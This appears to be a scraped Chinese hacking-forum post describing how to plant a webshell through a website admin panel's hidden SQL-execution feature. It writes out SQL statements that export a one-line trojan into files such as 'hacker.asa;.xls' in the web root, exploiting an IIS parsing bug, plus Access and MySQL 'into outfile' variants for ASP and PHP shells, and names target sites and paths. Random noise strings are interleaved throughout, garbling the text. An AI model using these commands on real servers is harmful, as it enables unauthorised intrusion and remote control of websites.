好不容易进了后台,发现啥上传啊。备份啊多木有。/ `5 a, g7 N: F: D, t/ a
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
" \9 k% B& Z6 G, {1 Y3 L) Q& f文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,) y% `) v) Q5 c) |5 K2 m3 y
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
& \ N$ _$ S9 H' b/ q) f1.create table cmd (a varchar(50))2 o. _: q" J7 F- V8 F! D" |" a
2.insert into cmd (a) values (‘‘)
$ N4 @2 n" D( L3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd. ~0 t4 ^4 d! V! Q, |
(把表cmd的内容导出为物理路径的一个EXCEL文件)
( O- n4 B2 m: V$ |4 g4.drop table cmd3 F, P. w9 t1 a' b* }
利用IIS的BUG成功拿到了WEBSHELL。
( w8 O- j* C2 C# Y; J( ?" G
# J1 Q Z. @4 b$ v1 N" J直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话7 g* P( P3 d) B; S1 x; g' i1 E
; t S6 @. t; ?, J SQL语句意思解释:
& i" S1 i4 V! k4 q! S, z2 c% b/ q1 I- E6 ] 第一句
; y4 a- a2 U. d- N 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
- G5 T1 ] J6 P; q9 v W& L2 [( u2 M/ n+ p
第二句
, M% _% K% c& c1 v8 [: ` 在表cmd的a字段插入一句话木马; e2 @' m) P8 |8 q H) {6 g4 e
第三句
* [: g( h, G. s% \+ z; l# F* [8 E 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
! v4 N" W' X+ Q& T
! O$ ~* h! [; j0 j 第四句0 t/ X0 U3 g, q8 D |/ [/ @# W
删除建立的cmd表
# ]1 v% X+ S5 @7 X: O3 |4 r0 r, Y% L, i8 |; a: f3 E
以下内容为测试:
$ u O7 a( F" J7 _0 o5 D Access利用后台SQL执行命令功能导出WebShell:4 b! S6 m; Y9 v. [
这个更简单:
3 h" j) m) _, v4 B5 k [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]" u/ M7 V( m# R% _) m. j6 R
或者
5 N. q( `, ?) [. w# ?( o9 w, S [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
; T, }$ \2 O9 D/ N& T) p
8 p9 k [: t* v# F0 i _6 @ 后台有执行SQL语句功能(vote为已知表段) r% O/ w5 s" R. ]
希望对大家有所帮助拿shell的又一个思路
, n5 {/ j3 @" ~8 s0 Q4 ^0 O; \ |